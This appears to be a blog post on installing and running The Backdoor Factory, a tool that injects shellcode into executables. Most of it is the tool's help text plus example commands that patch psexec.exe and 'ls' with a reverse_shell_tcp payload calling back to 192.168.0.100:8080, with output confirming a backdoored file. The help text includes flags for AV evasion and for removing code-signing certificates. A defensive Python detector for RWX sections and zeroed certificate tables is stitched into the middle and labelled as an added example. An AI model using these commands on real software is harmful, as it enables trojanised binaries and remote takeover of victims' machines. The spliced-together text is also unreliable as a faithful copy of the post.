Reference: https://github.com/secretsquirrel/the-backdoor-factory
Looks quite interesting; worth looking into in depth.

Installation

1. easy_install
wget "https://pypi.python.org/packages/source/e/ez_setup/ez_setup-0.9.tar.gz#md5=1ac53445a67bf68eb2676a72cc3f87f8" -O easy.tar.gz
tar vxf easy.tar.gz
cd ez_setup-0.9/
python ez_setup.py

2. Install pip
wget 'https://pypi.python.org/packages/source/p/pip/pip-1.5.6.tar.gz#md5=01026f87978932060cc86c1dc527903e' -O pip.tar.gz
tar vxf pip.tar.gz
python setup.py install

3. Install the-backdoor-factory
wget https://github.com/secretsquirrel/the-backdoor-factory/archive/master.zip
unzip master.zip
cd the-backdoor-factory-master/
./install.sh
Supported formats:

Quote:
Windows PE x86/x64,ELF x86/x64 (System V, FreeBSD, ARM Little Endian x32),
and Mach-O x86/x64 and those formats in FAT files
Packed Files: PE UPX x86/x64
Experimental: OpenBSD x32
Usage
root@kali:~/the-backdoor-factory-master# ./backdoor.py -h
Usage: backdoor.py [options]

Options:
  -h, --help            show this help message and exit
  -f FILE, --file=FILE  File to backdoor
  -s SHELL, --shell=SHELL
                        Payloads that are available for use. Use 'show' to see payloads.
  -H HOST, --hostip=HOST
                        IP of the C2 for reverse connections.
  -P PORT, --port=PORT  The port to either connect back to for reverse shells or to listen on for bind shells
  -J, --cave_jumping    Select this options if you want to use code cave jumping to further hide your shellcode in the binary.
  -a, --add_new_section
                        Mandating that a new section be added to the exe (better success) but less av avoidance
  -U SUPPLIED_SHELLCODE, --user_shellcode=SUPPLIED_SHELLCODE
                        User supplied shellcode, make sure that it matches the architecture that you are targeting.
  -c, --cave            The cave flag will find code caves that can be used for stashing shellcode. This will print to all the code caves of a specific size. The -l flag can be use with this setting.
  -l SHELL_LEN, --shell_length=SHELL_LEN
                        For use with -c to help find code caves of different sizes
  -o OUTPUT, --output-file=OUTPUT
                        The backdoor output file
  -n NSECTION, --section=NSECTION
                        New section name must be less than seven characters
  -d DIR, --directory=DIR
                        This is the location of the files that you want to backdoor. You can make a directory of file backdooring faster by forcing the attaching of a codecave to the exe by using the -a setting.
  -w, --change_access   This flag changes the section that houses the codecave to RWE. Sometimes this is necessary. Enabled by default. If disabled, the backdoor may fail.
  -i, --injector        This command turns the backdoor factory in a hunt and shellcode inject type of mechinism. Edit the target settings in the injector module.
  -u SUFFIX, --suffix=SUFFIX
                        For use with injector, places a suffix on the original file for easy recovery
  -D, --delete_original
                        For use with injector module. This command deletes the original file. Not for use in production systems. *Author not responsible for stupid uses.*
  -O DISK_OFFSET, --disk_offset=DISK_OFFSET
                        Starting point on disk offset, in bytes. Some authors want to obfuscate their on disk offset to avoid reverse engineering, if you find one of those files use this flag, after you find the offset.
  -S, --support_check   To determine if the file is supported by BDF prior to backdooring the file. For use by itself or with verbose. This check happens automatically if the backdooring is attempted.
  -M, --cave-miner      Future use, to help determine smallest shellcode possible in a PE file
  -q, --no_banner       Kills the banner.
  -v, --verbose         For debug information output.
  -T IMAGE_TYPE, --image-type=IMAGE_TYPE
                        ALL, x86, or x64 type binaries only. Default=ALL
  -Z, --zero_cert       Allows for the overwriting of the pointer to the PE certificate table effectively removing the certificate from the binary for all intents and purposes.
  -R, --runas_admin     Checks the PE binaries for 'requestedExecutionLevel level="highestAvailable"'. If this string is included in the binary, it must run as system/admin. Doing this slows patching speed significantly.
  -L, --patch_dll       Use this setting if you DON'T want to patch DLLs. Patches by default.
  -F FAT_PRIORITY, --FAT_PRIORITY=FAT_PRIORITY
                        For MACH-O format. If fat file, focus on which arch to patch. Default is x64. To force x86 use -F x86, to force both archs use -F ALL.
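Two of the options above leave traces a defender can look for on disk: -w leaves the section that houses the code cave marked RWE, and -Z zeroes the pointer to the PE certificate table. The following Python check is an added example, not code from the original post or from the BDF project; it parses the PE headers directly and builds a constructed, headers-only PE32 sample inline so it runs offline (a real check would read the file from disk).

```python
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECURITY_DIR = 4  # index of IMAGE_DIRECTORY_ENTRY_SECURITY (Authenticode table)

def parse_pe(data):
    """Return ([(section_name, characteristics), ...], (cert_offset, cert_size))."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    coff = e_lfanew + 4
    nsec = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    dirs = opt + (96 if magic == 0x10B else 112)  # PE32 vs PE32+ data directories
    cert = struct.unpack_from("<II", data, dirs + 8 * SECURITY_DIR)
    sections = []
    for i in range(nsec):
        hdr = opt + opt_size + 40 * i  # section headers follow the optional header
        name = data[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        sections.append((name, struct.unpack_from("<I", data, hdr + 36)[0]))
    return sections, cert

def bdf_indicators(data):
    """Report sections that are both writable and executable (what -w leaves
    behind) and an emptied certificate-table directory entry (what -Z leaves)."""
    sections, (cert_off, cert_size) = parse_pe(data)
    rwx = [n for n, c in sections
           if c & IMAGE_SCN_MEM_EXECUTE and c & IMAGE_SCN_MEM_WRITE]
    return {"rwx_sections": rwx, "cert_table_zeroed": cert_off == 0 and cert_size == 0}

def build_sample_pe(sections, cert=(0x3000, 0x800)):
    """Constructed headers-only PE32 used as demo input; not a real binary."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, len(dos))  # e_lfanew
    opt = bytearray(224)  # PE32 optional header incl. 16 data directories
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<II", opt, 96 + 8 * SECURITY_DIR, *cert)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x102)
    hdrs = b"".join(struct.pack("<8sIIIIIIHHI", n, 0, 0, 0, 0, 0, 0, 0, 0, c)
                    for n, c in sections)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + hdrs
```

A writable-and-executable section is a triage signal rather than proof, since packers and some legitimate build settings produce the same flags; the absence of a certificate table only matters for a binary that is expected to be signed.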
Examples:
./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp
./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a
./backdoor.py -d test/ -i 192.168.0.100 -p 8080 -s reverse_shell_tcp -a
msfpayload windows/exec CMD='calc.exe' R > calc.bin
./backdoor.py -f ls -s user_supplied_shellcode -U calc.bin
root@kali:~/the-backdoor-factory-master# ./backdoor.py -f psexec.exe -s user_supplied_shellcode -U calc.bin
./backdoor.py -i -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a -u .moocowwow
Quote:
root@kali:~/the-backdoor-factory-master# ./backdoor.py -f ls -U calc.bin
-.(`-') (`-') _ <-.(`-') _(`-') (`-')
__( OO) (OO ).-/ _ __( OO)( (OO ).-> .-> .-> <-.(OO )
'-'---.\ / ,---. \-,-----.'-'. ,--.\ .'_ (`-')----. (`-')----. ,------,)
| .-. (/ | \ /`.\ | .--./| .' /'`'-..__)( OO).-. '( OO).-. '| /`. '
| '-' `.) '-'|_.' | /_) (`-')| /)| | ' |( _) | | |( _) | | || |_.' |
| /`'. |(| .-. | || |OO )| . ' | | / : \| |)| | \| |)| || . .'
| '--' / | | | |(_' '--'\| |\ \| '-' / ' '-' ' ' '-' '| |\ \
`------' `--' `--' `-----'`--' '--'`------' `-----' `-----' `--' '--'
(`-') _ (`-') (`-')
<-. (OO ).-/ _ ( OO).-> .-> <-.(OO ) .->
(`-')-----./ ,---. \-,-----./ '._ (`-')----. ,------,) ,--.' ,-.
(OO|(_\---'| \ /`.\ | .--./|'--...__)( OO).-. '| /`. '(`-')'.' /
/ | '--. '-'|_.' | /_) (`-')`--. .--'( _) | | || |_.' |(OO \ /
\_) .--'(| .-. | || |OO ) | | \| |)| || . .' | / /)
`| |_) | | | |(_' '--'\ | | ' '-' '| |\ \ `-/ /`
`--' `--' `--' `-----' `--' `-----' `--' '--' `--'
Author: Joshua Pitts
Email: the.midnite.runr[a t]gmail<d o t>com
Twitter: @midnite_runr
2.3.1
reverse_shell_tcp
reverse_tcp_stager
user_supplied_shellcode
[!] Could not set shell
Quote:
root@kali:~/the-backdoor-factory-master# ./backdoor.py -f ls -s reverse_shell_tcp -U calc.bin
-.(`-') (`-') _ <-.(`-') _(`-') (`-')
__( OO) (OO ).-/ _ __( OO)( (OO ).-> .-> .-> <-.(OO )
'-'---.\ / ,---. \-,-----.'-'. ,--.\ .'_ (`-')----. (`-')----. ,------,)
| .-. (/ | \ /`.\ | .--./| .' /'`'-..__)( OO).-. '( OO).-. '| /`. '
| '-' `.) '-'|_.' | /_) (`-')| /)| | ' |( _) | | |( _) | | || |_.' |
| /`'. |(| .-. | || |OO )| . ' | | / : \| |)| | \| |)| || . .'
| '--' / | | | |(_' '--'\| |\ \| '-' / ' '-' ' ' '-' '| |\ \
`------' `--' `--' `-----'`--' '--'`------' `-----' `-----' `--' '--'
(`-') _ (`-') (`-')
<-. (OO ).-/ _ ( OO).-> .-> <-.(OO ) .->
(`-')-----./ ,---. \-,-----./ '._ (`-')----. ,------,) ,--.' ,-.
(OO|(_\---'| \ /`.\ | .--./|'--...__)( OO).-. '| /`. '(`-')'.' /
/ | '--. '-'|_.' | /_) (`-')`--. .--'( _) | | || |_.' |(OO \ /
\_) .--'(| .-. | || |OO ) | | \| |)| || . .' | / /)
`| |_) | | | |(_' '--'\ | | ' '-' '| |\ \ `-/ /`
`--' `--' `--' `-----' `--' `-----' `--' '--' `--'
Author: Joshua Pitts
Email: the.midnite.runr[a t]gmail<d o t>com
Twitter: @midnite_runr
2.3.1
File ls is in the 'backdoored' directory